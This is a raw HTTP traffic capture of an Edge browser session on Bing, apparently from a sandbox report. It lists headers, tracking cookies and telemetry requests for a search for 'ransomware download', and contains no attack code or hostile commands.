useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-38MjMeFgQbuJLgU+lxiehsP5owi04GjmgfwE1VoE7EM='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:49 GMT
set-cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=; domain=.bing.com; expires=Fri, 28-Feb-2025 15:31:49 GMT; path=/; secure; SameSite=None
set-cookie: _Rwho=u=d; domain=.bing.com; path=/; secure; HttpOnly; SameSite=None
set-cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220709.b314e61
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A1340%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1709220706894%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A1340%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1709220706894%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
content-type: text/html; charset=utf-8
cache-control: no-cache, no-store, must-revalidate
content-encoding: br
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 65e0a36590034743be1ea1687d8ec9bb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-poP3i3y30AWpguqhFzReq+ftHKYUrc0nzyWq/BQVxB8='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220709.b314e60
-
GEThttps://www.bing.com/images/sbi?mmasync=1&ig=92027AEB1C3C42769F3D4EA5938FBAC6&iid=.5100&ptn=Web&ep=0&iconpl=1msedge.exeRemote address:92.123.128.152:443RequestGET /images/sbi?mmasync=1&ig=92027AEB1C3C42769F3D4EA5938FBAC6&iid=.5100&ptn=Web&ep=0&iconpl=1 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: C2894553E99B46A9B8E47E67EB18AE4E Ref B: LON04EDGE1110 Ref C: 2024-02-29T15:31:50Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220710.b315042
-
POSThttps://www.bing.com/rewardsapp/ncheader?ver=43901714&IID=SERP.5057&IG=92027AEB1C3C42769F3D4EA5938FBAC6msedge.exeRemote address:92.123.128.152:443RequestPOST /rewardsapp/ncheader?ver=43901714&IID=SERP.5057&IG=92027AEB1C3C42769F3D4EA5938FBAC6 HTTP/2.0
host: www.bing.com
content-length: 4
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
cookie: SRCHUSR=DOB=20240229&T=1709220708000
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: C9924A7D2CC54F9391744FE63198DE73 Ref B: LON04EDGE0710 Ref C: 2024-02-29T15:31:50Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220710.b315043
-
POSThttps://www.bing.com/rewardsapp/reportActivity?IG=92027AEB1C3C42769F3D4EA5938FBAC6&IID=SERP.5066&q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531msedge.exeRemote address:92.123.128.152:443RequestPOST /rewardsapp/reportActivity?IG=92027AEB1C3C42769F3D4EA5938FBAC6&IID=SERP.5066&q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531 HTTP/2.0
host: www.bing.com
content-length: 168
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
cookie: SRCHUSR=DOB=20240229&T=1709220708000
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D15B5EC683484F009F49085BC515E11D Ref B: LTSEDGE1508 Ref C: 2024-02-29T15:31:50Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220710.b31504f
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.WPT%22,%22FID%22:%22CI%22,%22Name%22:%22SydneyFullScreenConvViewLoaded%22,%22Text%22:%22ViewLoaded%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.WPT%22,%22FID%22:%22CI%22,%22Name%22:%22SydneyFullScreenConvViewLoaded%22,%22Text%22:%22ViewLoaded%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
ResponseHTTP/2.0 200
content-length: 1
content-type: text/html
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 65e0a366caa84937ad2c230f39f7f4c8
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-gWYNqrG+Xt6yOaiV1OP3motcnZBB7ONl+ITs05vsbq4='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: CDF6D5D5AECC4C598FBB9F7CAD140489 Ref B: LTSEDGE1422 Ref C: 2024-02-29T15:31:50Z
date: Thu, 29 Feb 2024 15:31:50 GMT
set-cookie: MUIDB=060B31E3593A60702C3D25D75802611A; expires=Tue, 25-Mar-2025 15:31:50 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=0488D9B7073966C40B21CD8306016704; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220710.b31524e
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.WPT%22,%22FID%22:%22CI%22,%22Name%22:%22SydneyFullScreenConvLoadSydneyConvResWithPayWall%22,%22Text%22:%22false%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.WPT%22,%22FID%22:%22CI%22,%22Name%22:%22SydneyFullScreenConvLoadSydneyConvResWithPayWall%22,%22Text%22:%22false%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
ResponseHTTP/2.0 200
content-length: 15628
content-type: text/html; charset=utf-8
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 65e0a3667a954602a32952e41429f8ab
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-/pxnQ/41qIRvwcY8cQJCUIpYQCzNxGGidOJKLNPTu/o='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: B3CB80AA174B42889FB11B3593CFFCFF Ref B: LTSEDGE1614 Ref C: 2024-02-29T15:31:50Z
date: Thu, 29 Feb 2024 15:31:50 GMT
set-cookie: MUIDB=060B31E3593A60702C3D25D75802611A; expires=Tue, 25-Mar-2025 15:31:50 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220710.b315510
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.WPT%22,%22FID%22:%22CI%22,%22Name%22:%22SydneyFullScreenConvUseSydneyPayWall%22,%22Text%22:%22false%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.WPT%22,%22FID%22:%22CI%22,%22Name%22:%22SydneyFullScreenConvUseSydneyPayWall%22,%22Text%22:%22false%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 208A572AF52D4406A99FA06F57F62A02 Ref B: LTSEDGE1422 Ref C: 2024-02-29T15:31:50Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220710.b31552b
-
Remote address:92.123.128.152:443RequestPOST /orgid/idtoken/conditional HTTP/2.0
host: www.bing.com
content-length: 693
cache-control: max-age=0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
origin: https://login.microsoftonline.com
upgrade-insecure-requests: 1
dnt: 1
content-type: application/x-www-form-urlencoded
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://login.microsoftonline.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
cookie: SRCHUSR=DOB=20240229&T=1709220708000
